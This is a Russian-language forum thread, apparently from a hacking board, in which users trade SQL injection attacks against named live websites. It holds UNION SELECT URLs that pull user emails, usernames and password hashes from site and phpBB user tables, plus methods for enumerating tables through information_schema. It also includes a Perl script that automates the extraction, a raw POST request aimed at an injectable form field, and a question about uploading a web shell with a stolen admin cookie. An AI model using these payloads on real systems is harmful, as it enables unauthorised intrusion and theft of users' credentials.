Hi All Такой вопрос зашёл в админку Coppermine Photo Gallery через куку админа такой вопрос как лучше залить шел ? заранее спасибо !!! http://forum.antichat.ru/threadnav59410-1-10-Coppermine%2BPhoto%2BGallery.html
кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/* Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли(( http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/* вот колонки phpbb http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/* Подскажите если не трудно
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+1,2/* Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_password,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1/* юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users. А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.columns+where+column_name='password'/* Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()
мде.. Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком ) ЗЫ:Первые 17 значений - системные таблы!
2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea )) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat' )) uda4i vam vsem v va6em nelegkom trude....
xcedz откуда в mssql - load_file() взялся? Что ты подразумеваешь под другой БД? имена бд на сервере можно так посматреть: если ты конечно про это...
Нет ... я знаю имена всех БД например сейчас есть подключение с БД test1 а на сервре через SELECT DB_NAME(N) я просмотрел все БД например test1,test2,test3 можно ли выташить данные из test2?
PHP: #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; $x=0; $y = $ARGV[0]; open(TT,">","mda.txt") or die "$!"; while ($x<=$y) { my $omfg = $ua->get("[СКУЛЬ ТУТ")->content; $omfg =~m%###(.*?)###%i; my $table = $1; print TT $x,":",$table, "\n"; $x++; } close TT; Сначало узнаёшь общее кол-во таблиц/колонок, count(table_name) from information_shema.tables/columns Дальше в скрипт вписываешь скуль в таком виде: http://site.ru/index.php?id=-1+union+select+1,2,3,concat(0x232323,table_name,0x232323),4,5+from+information_schema.tables+limit+$x,1-- Запуск: perl script.pl 23 где 23 - общее кол-во таблиц/колонок. Скрипт впринципе можно переделать хоть подо что. Многотредовую версию с поддержкой проксей не выкладываю, ибо нех:\
Растолкуйте мне непонятливому кто нибудь как работает этот эксплоит. А то я что-то в нем запутался а точнее какую ссылку он создает. Хотелось бы потренироваться вручную проводить такие иньекты. Да и на будующее пригодиться пробовал на localhost-e но получил в отчетах бред
я это видел. Но когда я пытался составить запрос вручную, меня кидало на главную стр. Приведи please рабочую ссылку, а я от нее буду отталкиваться дальше
samarin, это POST запрос submit.php запускается когда ты хочешь что-либо добавить на сайт (ссылку, картинку, новость, статью - это как правило доступно только зарегистрированным пользователям сайта). Допустим это ссылка, тогда ты видишь перед собой форму добавления новой ссылки, куда надо вписать категорию ссылки (link_category), имя (link_name), урл (link_url) и описание (link_description - здесь и есть скуля), после этого ты нажимаешь "Отправить ссылку" и браузер отправляет POST запрос, например на сайте 1С 1cnastole.info он будет выглядеть к примеру так: Code: POST /submit.php?stype=l HTTP/1.1 Host: 1cnastole.info User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://1cnastole.info/submit.php?stype=l Cookie: fusion_visited=yes; fusion_user=211.b111406bc3sdfgs1cf532bfcc68d8d; fusion_lastvisit=1123123 Content-Type: application/x-www-form-urlencoded Content-Length: 216 link_category=1%D1%3A%D4%F0%E0%ED%F7%E0%E9%E7%E8&link_name=%CD%E5%F2%EE&link_url=http%3A%2F%2Fqwer.ru&link_description=%F3%E4%E0%EB%E8%F2%E5+%EF%EB%E8%E7+%29&submit_link=%CE%F2%EF%F0%E0%E2%E8%F2%FC+%F1%F1%FB%EB%EA%F3 Результат увидишь когда ссылка добавится на сайт. (в эксплоите написано где именно).
